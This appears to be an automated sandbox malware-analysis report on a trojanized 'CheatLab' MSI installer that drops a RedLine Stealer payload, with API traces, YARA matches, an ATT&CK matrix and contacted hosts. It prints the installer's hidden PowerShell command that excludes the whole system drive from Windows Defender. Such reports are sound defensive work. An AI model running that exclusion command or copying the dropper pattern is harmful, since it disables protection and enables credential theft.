          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF73AF38900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_00007FF73AF38900
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E8D4C8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,18_2_00007FF7B1E8D4C8
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E8D9D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF7B1E8D9D4
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E8DBB8 SetUnhandledExceptionFilter,18_2_00007FF7B1E8DBB8
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1EB8900 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00007FF7B1EB8900
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 18_2_00007FF7B1E8D0B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00007FF7B1E8D0B0
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_004080CD _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_004080CD
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040C35A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0040C35A
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0041145F SetUnhandledExceptionFilter,21_2_0041145F
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040A46F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_0040A46F
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 21_2_0040A7DA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_0040A7DA

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Adds a directory exclusion to Windows Defender
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A452F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,6_2_00A452F0
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.luaJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat" Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeQueries volume information: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe VolumeInformationJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: EnumSystemLocalesW,6_2_00A7E0C6
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: EnumSystemLocalesW,6_2_00A7E1AC
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: EnumSystemLocalesW,6_2_00A77132
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: EnumSystemLocalesW,6_2_00A7E111
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_00A7E237
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: GetLocaleInfoEx,6_2_00A623F8
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: GetLocaleInfoW,6_2_00A7E48A
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00A7E5B3
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: GetLocaleInfoW,6_2_00A776AF
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: GetLocaleInfoW,6_2_00A7E6B9
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00A7E788
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,6_2_00A7DE24
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: try_get_function,GetLocaleInfoW,17_2_00007FF73AF39934
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,17_2_00007FF73AF4A03C
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: EnumSystemLocalesW,17_2_00007FF73AF392FC
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00007FF73AF4AA70
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: EnumSystemLocalesW,17_2_00007FF73AF4A458
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: EnumSystemLocalesW,17_2_00007FF73AF4A388
          Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_00007FF73AF4A894
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: EnumSystemLocalesW,18_2_00007FF7B1EB92FC
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: try_get_function,GetLocaleInfoW,18_2_00007FF7B1EB9934
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,18_2_00007FF7B1ECA03C
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: EnumSystemLocalesW,18_2_00007FF7B1ECA458
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: EnumSystemLocalesW,18_2_00007FF7B1ECA388
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_00007FF7B1ECA894
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_00007FF7B1ECAA70
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,21_2_00418849
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,21_2_00418815
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,21_2_00414972
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,21_2_00418988
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,21_2_00414A89
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,21_2_00414B21
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,21_2_004153C0
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,21_2_0040E3E4
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,21_2_00413BE6
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,21_2_00414B95
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,21_2_0041554E
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,21_2_00414D67
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,21_2_0040D56D
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,21_2_00413578
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_00414E28
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,21_2_00413E3E
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,21_2_004186C5
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,21_2_00414ECB
          Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_00414E8F
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A635A9 cpuid 6_2_00A635A9
          Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A637D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00A637D5
          Source: C:\Windows\Installer\MSI7D5A.tmpCode function: 6_2_00A77B1F GetTimeZoneInformation,6_2_00A77B1F
          Source: Amcache.hve.25.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.25.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.25.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.25.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Yara detected RedLine Stealer
          Source: Yara matchFile source: 21.2.connect.exe.20b0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2617633919.00000000020B2000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected RedLine Stealer
          Source: Yara matchFile source: 21.2.connect.exe.20b0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 21.2.connect.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000015.00000002.2617344852.0000000000425000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.2617633919.00000000020B2000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          1
          Replication Through Removable Media          		1
          Scripting          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		11
          Disable or Modify Tools          		OS Credential Dumping2
          System Time Discovery          		1
          Replication Through Removable Media          		1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts3
          Native API          		1
          Scheduled Task/Job          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory11
          Peripheral Device Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Scheduled Task/Job          		1
          Registry Run Keys / Startup Folder          		11
          Process Injection          		1
          Scripting          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts1
          PowerShell          		Logon Script (Mac)1
          Scheduled Task/Job          		2
          Obfuscated Files or Information          		NTDS34
          System Information Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer3
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon Script1
          Registry Run Keys / Startup Folder          		1
          DLL Side-Loading          		LSA Secrets141
          Security Software Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          File Deletion          		Cached Domain Credentials131
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items123
          Masquerading          		DCSync2
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job131
          Virtualization/Sandbox Evasion          		Proc Filesystem1
          Application Window Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
          Process Injection          		/etc/passwd and /etc/shadow1
          System Network Configuration Discovery          		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1337007 Sample: Cheat.Lab.2.7.1.msi Startdate: 04/11/2023 Architecture: WINDOWS Score: 44 77 ip-api.com 2->77 79 cdn.discordapp.com 2->79 91 Malicious sample detected (through community Yara rule) 2->91 93 Yara detected RedLine Stealer 2->93 95 Uses schtasks.exe or at.exe to add and modify task schedules 2->95 97 Drops large PE files 2->97 10 msiexec.exe 14 37 2->10         started        14 msiexec.exe 15 2->14         started        16 NzEx.exe 2->16         started        18 2 other processes 2->18 signatures3 process4 file5 55 C:\Windows\Installer\MSI8673.tmp, PE32 10->55 dropped 57 C:\Windows\Installer\MSI7D5A.tmp, PE32 10->57 dropped 59 C:\Windows\Installer\MSI7CBC.tmp, PE32 10->59 dropped 67 5 other malicious files 10->67 dropped 103 Drops executables to the windows directory (C:\Windows) and starts them 10->103 20 msiexec.exe 1 10->20         started        23 MSI7D5A.tmp 1 10->23         started        25 msiexec.exe 10->25         started        27 msiexec.exe 2 10->27         started        61 C:\Users\user\AppData\Local\...\MSI92D9.tmp, PE32 14->61 dropped 63 C:\Users\user\AppData\Local\...\MSI92A9.tmp, PE32 14->63 dropped 65 C:\Users\user\AppData\Local\...\MSI5ED6.tmp, PE32 14->65 dropped 69 7 other malicious files 14->69 dropped signatures6 process7 signatures8 99 Query firmware table information (likely to detect VMs) 20->99 29 LuaJIT.exe 2 35 20->29         started        33 cmd.exe 1 23->33         started        process9 dnsIp10 81 193.37.71.112, 49706, 80 VAD-SRL-AS1MD Russian Federation 29->81 83 ip-api.com 208.95.112.1, 49704, 80 TUT-ASUS United States 29->83 85 cdn.discordapp.com 162.159.130.233, 443, 49715, 49716 CLOUDFLARENETUS United States 29->85 71 C:\Users\user\AppData\Roaming\...\connect.exe, PE32 29->71 dropped 73 C:\ProgramData\...73zEx.exe, PE32+ 29->73 dropped 75 C:\ProgramData\...\CheatLab.lua, data 29->75 dropped 36 connect.exe 1 29->36         started        39 schtasks.exe 1 29->39         started        41 schtasks.exe 1 29->41         started        87 Suspicious powershell command line found 33->87 89 Adds a directory exclusion to Windows Defender 33->89 43 powershell.exe 23 33->43         started        45 conhost.exe 33->45         started        file11 signatures12 process13 signatures14 101 Antivirus detection for dropped file 36->101 47 WerFault.exe 22 16 36->47         started        49 conhost.exe 36->49         started        51 conhost.exe 39->51         started        53 conhost.exe 41->53         started        process15

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Cheat.Lab.2.7.1.msi0%ReversingLabs
          Cheat.Lab.2.7.1.msi2%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe100%AviraTR/Crypt.OPACK.Gen
          C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe0%ReversingLabs
          C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe1%VirustotalBrowse
          C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe0%ReversingLabs
          C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe1%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI5CFA.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI5CFA.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI5D78.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI5D78.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI5D99.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI5D99.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI5DA9.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI5DA9.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI5E18.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI5E18.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI5E96.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI5E96.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI5EB6.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI5EB6.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI5ED6.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI5ED6.tmp0%VirustotalBrowse
          C:\Users\user\AppData\Local\Temp\MSI92A9.tmp0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\MSI92A9.tmp0%VirustotalBrowse
